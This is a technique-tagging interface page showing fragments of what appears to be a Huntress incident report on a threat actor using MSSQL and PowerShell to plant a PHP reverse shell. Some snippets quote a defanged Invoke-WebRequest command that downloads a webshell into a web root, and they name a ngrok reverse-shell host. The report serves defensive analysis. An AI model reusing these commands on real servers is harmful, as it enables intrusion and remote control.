“] 146, and resulted in “ 200 ” status code responses, indicating that they were successful. however, no additional activity appeared to result from these queries. the attack, day 2 day 2 of the attack continued with activity similar to day 1, in that powershell scripts and comman…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
100%
“mssql messages in the windows event log dated 28 april 2023, and these observed failed login attempts were the first such messages within the investigative timeline. subsequent to these attempts, the threat actor ’ s activity began again at 18 : 27 : 10 utc, and continued for app…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
99%
“##mpseevcw. exe this resulted in windows defender generating a detection for trojan : html / webshell! msr, based on the container file c : \ program files \ microsoft sql server \ mssql14. sqlexpress17 \ mssql \ log \ tmpfqckc. txt, and subsequently the file c : \ program files …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
99%
“ngrok [. ] io, the same host listed in maa. php and fata. php. an excerpt of this code can be seen in figure 4, and is very similar to the code contained in the two php files. examining the web server logs for day 2 of the attack revealed no get requests for either maa. php or fa…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
98%
“in figure 1, a file on the web server, maa. php, was detected by windows defender as “ virtool : php / meterpreter. a! mtb ”. in addition, the use of the native windows utility, certutil. exe, was detected being used to decode a file on the endpoint. the huntress detection is ill…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
98%
“location : powershell - command invoke - webrequest - uri ' https [ : ] / / raw. githubusercontent [. ] com / hightidaoaa / azdaz / main / maa. php ' - outfile ' e : / inetpub / wwwroot / < redacted > / maa. php ' toward the end of the threat actor ’ s activity for the day, there…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
89%
“was changed from ‘ 0 ’ to ‘ 1 ’, enabling the stored procedure. this activity was followed by combinations of powershell scripts run via sqlservr. exe, edr telemetry ( result of commands in the powershell scripts being run ) resulting in alerts, and windows defender detecting and…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
66%
“location : powershell - command invoke - webrequest - uri ' https [ : ] / / raw. githubusercontent [. ] com / hightidaoaa / azdaz / main / maa. php ' - outfile ' e : / inetpub / wwwroot / < redacted > / maa. php ' toward the end of the threat actor ’ s activity for the day, there…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.003Windows Command Shell
64%
“what could be found in the maa. php and fata. php files, as illustrated in figure 4. attack timeline huntress analysts developed an investigative timeline from selected windows event log data, and included pertinent edr telemetry. the investigative timeline illustrated that the t…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
48%
“##tidaoaa - github repository owner 0. tcp. eu. ngrok [. ] io - target host for reverse shells mitre att & ck mapping initial access - t1078. 001, default accounts execution - t1059. 001, powershell, and t1059. 003, windows command shell persistence - t1078. 001, default accounts”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
45%
“what could be found in the maa. php and fata. php files, as illustrated in figure 4. attack timeline huntress analysts developed an investigative timeline from selected windows event log data, and included pertinent edr telemetry. the investigative timeline illustrated that the t…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
40%
“managing attack surface | huntress background given a diverse customer base, huntress sees a wide range of activity even when it comes to persistent threat actors. when such a threat actor makes attempts to compromise a customer with both managed edr and managed anti - virus ( ma…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Huntress recently detected interesting activity on an endpoint; a threat actor was attempting to establish a foothold on an endpoint by using commands issued via MSSQL to upload a reverse shell accessible from the web server. All attempts were obviated by MAV and process detections, but boy-howdy, did they try!